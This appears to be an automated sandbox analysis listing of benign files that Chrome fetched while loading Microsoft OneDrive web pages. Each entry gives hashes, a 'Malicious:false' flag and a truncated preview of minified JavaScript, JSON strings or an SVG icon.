                                        Preview:<svg width="20" height="20" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M10 5 8.586 3.586A2 2 0 0 0 7.172 3H2a1 1 0 0 0-1 1v12a1 1 0 0 0 1 1h16a1 1 0 0 0 1-1V6a1 1 0 0 0-1-1h-8z" fill="#FFB900"/><path d="M10 5 8.586 6.414A2 2 0 0 1 7.172 7H1v9a1 1 0 0 0 1 1h16a1 1 0 0 0 1-1V6a1 1 0 0 0-1-1h-8z" fill="#FFD75E"/><path d="M10 5 8.586 6.414A2 2 0 0 1 7.172 7H1v9a1 1 0 0 0 1 1h16a1 1 0 0 0 1-1V6a1 1 0 0 0-1-1h-8z" fill="url(#a)"/><path d="M2 16.5c-.373 0-.71-.142-.973-.367.061.492.477.863.973.867h16c.505 0 .905-.38.973-.867-.262.226-.6.367-.973.367H2z" fill="#BF5712"/><path opacity=".4" d="M8.836 6.914 10.75 5H10L8.586 6.414A2 2 0 0 1 7.172 7H1v.5h6.422a2 2 0 0 0 1.414-.586z" fill="#fff"/><defs><linearGradient id="a" x1="1" y1="5" x2="1" y2="17" gradientUnits="userSpaceOnUse"><stop stop-color="#fff" stop-opacity=".01"/><stop offset=".999" stop-color="#FFD75E" stop-opacity=".3"/></linearGradient></defs></svg>
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7110)
                                        Category:dropped
                                        Size (bytes):13448
                                        Entropy (8bit):5.311772704659855
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D11CBEC203A5499FD7D22A47531E4852
                                        SHA1:F5A5AF9E9AA44EBE33CC9BEFCE011C0D5FCD7C0E
                                        SHA-256:9D02AF575B5F934B13192805ABF350EA83592B4D518F0A995F26E46FB3435618
                                        SHA-512:0043E2AE2FB4DA3EF465E8A77FD55A6ABC1B62D05455095DDDD419511AD193B0D4AD07E19846FDA8217C0B190ADA6137C0645D6435C84831E9903A570528A26B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[68],{5844:function(e,t,n){n.d(t,{a:function(){return E}});var a=n("tslib_102"),i=n("react-lib"),r=n(2859),o=n(28),s=n(50),c=n("odsp.util_460"),d=n(101),l=n("fui.util_369");(0,l.Bv)([{rawString:".frame_610dbd83{border:none;display:block}"}]);var u=n(10),f=n("fui.core_351"),p=n(26),m=n(1520),_=n(43),h=n(37),b=n(105),g=n(7916),v={all:{pickerTitle:g.f,pickerTitleIntervals:g.e},files:{pickerTitle:g.b,pickerTitleIntervals:g.a},folders:{pickerTitle:g.d,pickerTitleIntervals:g.c}};function y(e){var t,n=e.title,a=e.selectionMode,i=e.itemMode;if(n)t=n;else{var r="multiple"===a?2:1,o=v[i],s=o.pickerTitle,d=o.pickerTitleIntervals;t=(0,c.OO)((0,c.Ot)(s,d,r)||"")}return t}var S=c.HW.isActivated("182B2FCC-2348-48AB-BFBE-04969610C5E1","10/18/2021","Split picker options across query-string and post-messaging"),D=c.HW.isActivated("69FB175A-8186-4311-9045-F073BA0B6A87","10/27/2021","Propagate current theme to File Picker"),I=c.H
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65466)
                                        Category:dropped
                                        Size (bytes):82839
                                        Entropy (8bit):5.253792934038991
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6F4C7CF3248164525FCCDC31D03F067B
                                        SHA1:591B73FAF97025B3BD60D3B5E44713910EC27CEE
                                        SHA-256:BD2C9BC913F42CDAB74396D3CC821748C774EE9CD880B5C75D3E97B8DF10F8D4
                                        SHA-512:23DA83A30157FC52E83FA845226C16C65D7179D1F383F77E48966AD840BBC60D542787C9FBDD4B3BBCE1D9FF16B7EFB36D2BAB3AC87F0B7C3C0F75BD0BCC52F3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*! For license information please see index.worker.js.LICENSE.txt */.!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var n=t();for(var r in n)("object"==typeof exports?exports:e)[r]=n[r]}}(self,(()=>(()=>{"use strict";var e,t,n={610:(e,t,n)=>{n.d(t,{CR:()=>l,Jh:()=>c,XA:()=>s,ZT:()=>o,ev:()=>d,gn:()=>a,mG:()=>u,pi:()=>i});var r=function(e,t){return r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},r(e,t)};function o(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function n(){this.constructor=e}r(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}var i=function(){return i=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var o in t=arguments[n
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (911)
                                        Category:dropped
                                        Size (bytes):2113
                                        Entropy (8bit):5.375724094824906
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:08D4677F7BC16FA2ABF51C7A6EA5E52D
                                        SHA1:D93B99CB7BBDF519C5086BED9EF05EEDB7DF0B18
                                        SHA-256:F43DC5275E616537D954DA148638EAB230D30CEF7DE0CFE125ECE1B53C22288A
                                        SHA-512:CD37FFBE5ACF357F6D559B0E03B1D4EEBE95C4D0961EFF2C967D850EE341CBE5824620734DE26316BB21C0F70AC7E9AE95FD63EB786280125852EC71E273C463
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[331,1064],{2787:function(e,t,n){n.r(t),n.d(t,{docAlreadyExists:function(){return s},fileNotFound:function(){return i},invalidView:function(){return r},listNotFound:function(){return o},newExperieceRenderingNotSupported:function(){return d},offline:function(){return f},onePageNavigationError:function(){return u},onePageNavigationViewMismatch:function(){return l},parsingError:function(){return p},queryThrottled:function(){return c},urlTooLongError:function(){return a.a}});var a=n(604),i=-2147024894,r=-2147024809,o=-1,s=-2130575257,c=-2147024860,d=-2,l=-3,u=-4,f=-5,p=-7}.,2786:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return c},c:function(){return o},d:function(){return s},e:function(){return r}});var a,i=n(2787);!function(e){e[e.icon=16]="icon",e[e.iconMin=16]="iconMin",e[e.bigIcon=48]="bigIcon",e[e.bigIconMin=48]="bigIconMin",e[e.regularMin=90]="regularMin",e[e.regular=130]="regular",e[e.nameM
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (5436)
                                        Category:downloaded
                                        Size (bytes):7373
                                        Entropy (8bit):5.337354968306107
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:980F0868D55650E08469781F6280C5C8
                                        SHA1:9E424910FFDCD121017DC5D8239371FCCDDEC9F5
                                        SHA-256:F0BFA989BB9B4406219981A59159EE51A169249982357D6CE8C7A061A8093FE8
                                        SHA-512:92D2DBE866D16A8401923BC597E7CF5C11BA78ADFFAD5696E25AADBC26AC0FE324B2D969C625099773A55E1354D5C6F6DF41FACE84EFED00E866AFE71059E18A
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/6.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[6,924],{3792:function(e,t,n){n.r(t),n.d(t,{getSessionToken:function(){return l}});var a=n("tslib_102"),i=n(1613),r=n(80),o=n(328),s=n(10),c=n("odsp.util_460"),d=n(1571);function l(e){var t=this;return function(n){return(0,a.Zd)(t,void 0,void 0,function(){var t,l,f,p,m,_,h,b,g,v,y,S,D,I,x,C,O,w=this;return(0,a.qr)(this,function(E){switch(E.label){case 0:if(t=e.scopes,l=void 0===t?["Files.ReadWrite.All"]:t,f=e.endpoint,p=e.driveUrl,m=e.qosExtraData,_=n((0,r.a)({graphDataSourceConfiguration:i.a,graphTokenProviderConfiguration:d.a})),h=_.graphDataSourceConfiguration,b=_.graphTokenProviderConfiguration,g=h&&h.ensureAuthToken,v=p&&h&&h.ensureAuthTokenWithAction,y=b&&b.getSessionToken,D=y?function(){return(0,a.Zd)(w,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,y({endpoint:f,driveUrl:p,path:p||f})];case 1:return[2,e.sent()]}})})}:v?function(){return(0,a.Zd)(w,void 0,void 0,
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (4551), with no line terminators
                                        Category:dropped
                                        Size (bytes):4551
                                        Entropy (8bit):5.389564111731932
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D845C7CFDF504D17DD1A01BC3F58D0E9
                                        SHA1:4BF62628612111A63DED2B04639BCF918D0C4EB9
                                        SHA-256:8FFBAC41E6195332D893B04AA93F305DDA63CC5317EE6D89E4D177CCCDE72240
                                        SHA-512:3398BB9E265849D4A0B67047D9AC47DDA235DF7261BC95B9B8D0B4F7575C7E06C312592CE76C8CDA1C7109866B0F2A128D3161C99785C3EC872956BD432B75D7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:Footprint=function(){var t=1,n=2,e=t|n,r=8,o=16,i=r|o,u=e|i,a=128,f=256,s=e|(a|f),c="http://",l=200,m="trans.gif",p="/apc/",g=5e3,d="trans.gif",h="100k.gif",v=822.128,w=1e3,T="GET",y="POST",M=-1,I="20190214",b="x-userhostaddress",D="x-endpoint",R="x-frontend";function q(t,n,e,r){if(!(n>=t.length)){e!==T&&e!==y&&(e=T);var o=function(){q(t,n+1,e,r)},i=new XMLHttpRequest;i.open(e,t[n],!0),i.onload=function(){4===i.readyState&&200===i.status?null!=r&&r(i):o()},i.onerror=o,i.timeout=g,i.ontimeout=o,i.send()}}function O(t,n){if(t<=0)return t;if(n&i&&t>0){var e=v/(t/w);return Math.round(e)}return Math.round(t)}function x(){function t(){return Math.floor(65536*(1+Math.random())).toString(16).substring(1)}return t()+t()+t()+t()+t()+t()+t()+t()}function H(){return!(!window.performance||!window.performance.getEntriesByName)}return{start:function(e,v,w,y,L){try{if(void 0===y&&(y=""),void 0===L&&(L=""),!e||0===e.trim().length||Number(w)!==w||w%1!=0||w<0)return;var S=L.trim().length>0,A=y.trim().len
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (2368)
                                        Category:dropped
                                        Size (bytes):2373
                                        Entropy (8bit):5.203193173904308
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E9DB29DB74EF1E37993B693BD4EC93FF
                                        SHA1:D711D1CAE6CCE0509DCD8E3F3C60433DB04568B6
                                        SHA-256:82CDA438FFD5D6450B3C0DFBE05D69BD9AE86C07FE0CE5F8B18D76CAF8EF1975
                                        SHA-512:3E368DFB467CE1B7697793DAB243FE6390FC00D7CF4752CC5A715C7F02ED81D7E78FEB8A1293B2E325685923131CC9242B580824D343B4A1E170749403438522
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1840],{6659:function(e,t,n){n.r(t),n.d(t,{PdfSaveHelper:function(){return l},resourceKey:function(){return u}});var a=n("tslib_102"),i=n("odsp.util_460"),r=n(1154),o=n(8281),s=n(594),c=n(4821),d=n(326),l=function(){function e(e,t){void 0===e&&(e={});var n=t.vroomDataRequestor,a=t.saveExecutor,i=t.identityDataSource;this._vroomDataRequestor=n,this._saveExecutor=a,this._identityDataSource=i}return e.prototype.getItemCurrentVersion=function(e,t){return(0,a.Zd)(this,void 0,void 0,function(){var n,i,r,o;return(0,a.qr)(this,function(a){switch(a.label){case 0:return n=void 0,i="/drive/items/".concat(e.itemId,"/versions?$select=id"),(0,c.m)()||!e.graph?[3,2]:(r=(0,d.e)(t),[4,this._identityDataSource.getSharePointToken(r)]);case 1:n=a.sent(),i="/drives/".concat(e.graph.driveId,"/items/").concat(e.itemId,"/versions?$select=id"),a.label=2;case 2:return[4,this._vroomDataRequestor.send({accessToken:n,apiName:"versions",pa
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):87
                                        Entropy (8bit):4.674522374636856
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1629709B420FE5981924392917611397
                                        SHA1:9925539FA01891AF3845AD86A3B0CA311A19AE4D
                                        SHA-256:63386A3F971A5A0189426BC682D9954C68BEBAEA78124543541F81F70A05BDDC
                                        SHA-512:7DA4ED173A42984C75B2A211CF4424AD3DA22E46281CDE7EFF1935DF5B1EE58EF3C3EF27F20DD61701394E74F2DAF19CA7A992A81201163A8E8C91E02528C014
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{"errors":[{"message":"A query is required.","extensions":{"code":"EXECUTION_ERROR"}}]}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):17147
                                        Entropy (8bit):4.926675206527061
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8D75B8E85D749610931E168F2EFCF555
                                        SHA1:11410945A27700DBE941C030189C637792AAC2CE
                                        SHA-256:485A60AD5AF1CEFF60C50A9BFB08A03F0C42B984034A2255820356938B82B2A0
                                        SHA-512:EA2196C089F4F10ABB20FBDB41E097C67211734F1C1919595E163CB5D90EAD00DF8D44629ADF854F84C666B2C0D8916DDDDA2F6555F495FDCEAE1BAB5419ECA0
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://shell.cdn.office.net/shellux/en/shellstrings.8d75b8e85d749610931e168f2efcf555.json
                                        Preview:{. "Microsoft": "Microsoft",. "FlexpaneCloseButton": "Close pane",. "Me_Header": "My account",. "MePhotoAriaLabel": "{0} {1} Current account's user photo",. "ChangePhotoAriaLabel": "{0} {1} Change the photo that appears in IM. This may open a new window.",. "MePhotoTitle": "Current account's user photo",. "ChangePhotoTitle": "Change the photo that appears in IM. This may open a new window.",. "AppLauncherAriaLabel": "App launcher opened",. "AppLauncherCloseAriaLabel": "Close the app launcher",. "AppLauncherHomeAriaLabel": "Microsoft 365, will be open in new tab",. "AppsModuleHeading": "Apps",. "Microsoft365": "Microsoft 365",. "AppsModuleAllApps": "All apps",. "AppsModuleAllAppsTooltip": "Open all apps",. "AllViewGroupShowMore": "Show More",. "AllViewGroupShowLess": "Show Less",. "AllViewBack": "Back",. "AllViewNewGroupHeading": "New",. "AllViewAdminSelectedGroupHeading": "Admin selected apps",. "AllViewMoreFirstPartyGroupHeading": "More from Microsoft",. "AllViewT
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7976)
                                        Category:downloaded
                                        Size (bytes):381572
                                        Entropy (8bit):5.421343031264688
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:76DC57138FF26F8A4411E9F1BDACA265
                                        SHA1:CB7F31C72425F552764BEBAFD4360DC66E3B128A
                                        SHA-256:55DA64F2577E2E9C2350FDDBABC148107F8DC0987298CBB2E93AA8598EBB3963
                                        SHA-512:C851BA820460E7EB1A077FEC78525608113E18E0C4C880C36DACD02013472EA25F7FB88B6CCA1E426C729C6EDE6C0628AC65BE1D9B467754F2CD0D6E55E658EC
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/356.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[356,217,1283,908,909,2038,127],{3044:function(e,t,n){n.d(t,{a:function(){return x}});var a=n(37),i=n("tslib_102"),r=n("react-lib"),o=n("fui.util_369"),s=n(127),c=n(111),d=n(47),l=n(241),u=n(2062),f=n(1120),p=n(2060),m=n(235),_=n(280),h=n(196),b=n(33),g=n(141),v=(0,b.a)(),y=[],S=function(e){function t(t){var n=e.call(this,t)||this;return n._root=r.createRef(),n._cellMeasurer=r.createRef(),n._focusZone=r.createRef(),n._onSelectionChanged=function(){var e=D(n.props);(0,o.Ao)(e,n.state.selectionState)||n.setState({selectionState:e})},n._updateDroppingState=function(e,t){var a=n.state.isDropping,i=n.props,r=i.dragDropEvents,o=i.item;e?r.onDragEnter&&(n._droppingClassNames=r.onDragEnter(o,t)):r.onDragLeave&&r.onDragLeave(o,t),a!==e&&n.setState({isDropping:e})},(0,s.a)(n),n._events=new o.dN(n),n.state={selectionState:D(t),columnMeasureInfo:void 0,isDropping:!1},n._droppingClassNames="",n}return(0,i.XJ)(t,e),t.getDer
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (18796)
                                        Category:dropped
                                        Size (bytes):61276
                                        Entropy (8bit):5.043378553842325
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:0162D53ECFBDAFDDC0439188F36E873D
                                        SHA1:5F58140C2E1E86DC8D2AD24AD7EC2766326593D7
                                        SHA-256:AE36B438CC9BB01A470E261AE3983E956C3019EF97E24DB100362661405553EF
                                        SHA-512:40E047B1BBB0FBF1D7486A427BB1DD0A81B726F62CEBC4E457142B6D50C83B867B0A8045F848C61A52E6878F90B4F6BFADECC479E9C6ABAD94792D64EC142E76
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{1042:function(e){e.exports=JSON.parse('{"d":"Copilot","e":"Show Copilot actions for selected items","j":"Summarize","l":"Summarize \\u0022{0}\\u0022","k":"Summarize these files","b":"Compare files","c":"Compare the differences between these files and put them in a table view","f":"Create an FAQ","g":"Create an FAQ from \\u0022{0}\\u0022","a":"Ask a question","n":"Get insights on multiple files with Copilot","m":"Quickly summarize, compare, and get answers from multiple files without opening them.","i":"Summarize files","h":"Got it"}')}.,1072:function(e){e.exports=JSON.parse('{"a":"Show Copilot actions for this item"}')}.,814:function(e){e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,1854:function(e){e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,287:function(e){e.exports
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (52441)
                                        Category:downloaded
                                        Size (bytes):251936
                                        Entropy (8bit):5.314644587457223
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D383254CCF15FF7228FB9D1AABF097DD
                                        SHA1:083FBBD4F1CC0BC0801B743990D1876040076919
                                        SHA-256:A70ACE43B0555EFE8494D031F1679D2A88AC76182044103AB23DAB9050A43DBA
                                        SHA-512:139F9E51576313A014AB962E00F8F9B3A3168717D9E432860F0B0C312BFC2A0A0D67EB1724A289AFF154E32D88E3953FE3BABFDE840C4871DA52E24B23095352
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/171.js
                                        Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[171],{2772:function(e,t,n){"use strict";n.d(t,{a:function(){return h}});var a=n(37),i=n("tslib_102"),r=n("react-lib"),o=n(33),s=n(141),c=(0,o.a)(),d=function(e){function t(t){var n=e.call(this,t)||this;n._onRenderProgress=function(e){var t=n.props,a=t.ariaLabel,i=t.ariaValueText,o=t.barHeight,s=t.className,d=t.description,l=t.label,u=void 0===l?n.props.title:l,f=t.styles,p=t.theme,m="number"==typeof n.props.percentComplete?Math.min(100,Math.max(0,100*n.props.percentComplete)):void 0,_=c(f,{theme:p,className:s,barHeight:o,indeterminate:void 0===m}),h={width:void 0!==m?m+"%":void 0,transition:void 0!==m&&m<.01?"none":void 0},b=void 0!==m?0:void 0,g=void 0!==m?100:void 0,v=void 0!==m?Math.floor(m):void 0;return r.createElement("div",{className:_.itemProgress},r.createElement("div",{className:_.progressTrack}),r.createElement("div",{className:_.progressBar,style:h,role:"progressbar","aria-describedby":d?n._descriptionId:void
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:downloaded
                                        Size (bytes):110227
                                        Entropy (8bit):5.4958606566668
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:EEAA79525034B3B269161A81D15F8F78
                                        SHA1:789883D1BAFBC96F515188557E68A12FBB73AC60
                                        SHA-256:6A8A2F83AF0C9D8F99349749C1C53DCA95A411D27A5A315929B8C27F0B976489
                                        SHA-512:D09B65F0856B29D07D8C9CAFD54C78D137F03C13CF5904B82658BBE7B083347EDD7AF0141106A1372C739E6379DDADF6F70D1E277C44232BA2D2700FAC0EDC96
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/item-viewer-pdf/mspdfkit.min.js
                                        Preview:var _scriptDir,mspdfkit=(_scriptDir="undefined"!=typeof document&&document.currentScript?document.currentScript.src:void 0,function(e){e=e||{};var t,n,r;t||(t=void 0!==e?e:{});t.ready=new Promise((function(e,t){n=e;r=t}));"_native_openDocument _native_openDocumentByChunk _native_openMipDocument _native_closeDocument _native_reloadCurrentDocument _native_reloadCurrentDocumentByChunk _native_reloadCurrentDocumentWithOriginalStream _native_reloadFonts _native_getPageCount _native_getLayoutSize _native_getPageSize _native_getPageText _native_isMip _native_setColorScheme _native_updateViewportRect _native_render _native_rotate _native_selectAll _native_startFind _native_selectFindResult _native_stopFind _native_onPointerPressed _native_onPointerMoved _native_onPointerReleased _native_onMultiTapped _native_onChar _native_onKeyDown _native_copyFormSelectedText _native_onFocusPage _native_onBlurPage _native_setAnnotationMode _native_readPdfStream _native_getTelemetryData _native_hasSignature _
                                        No static file info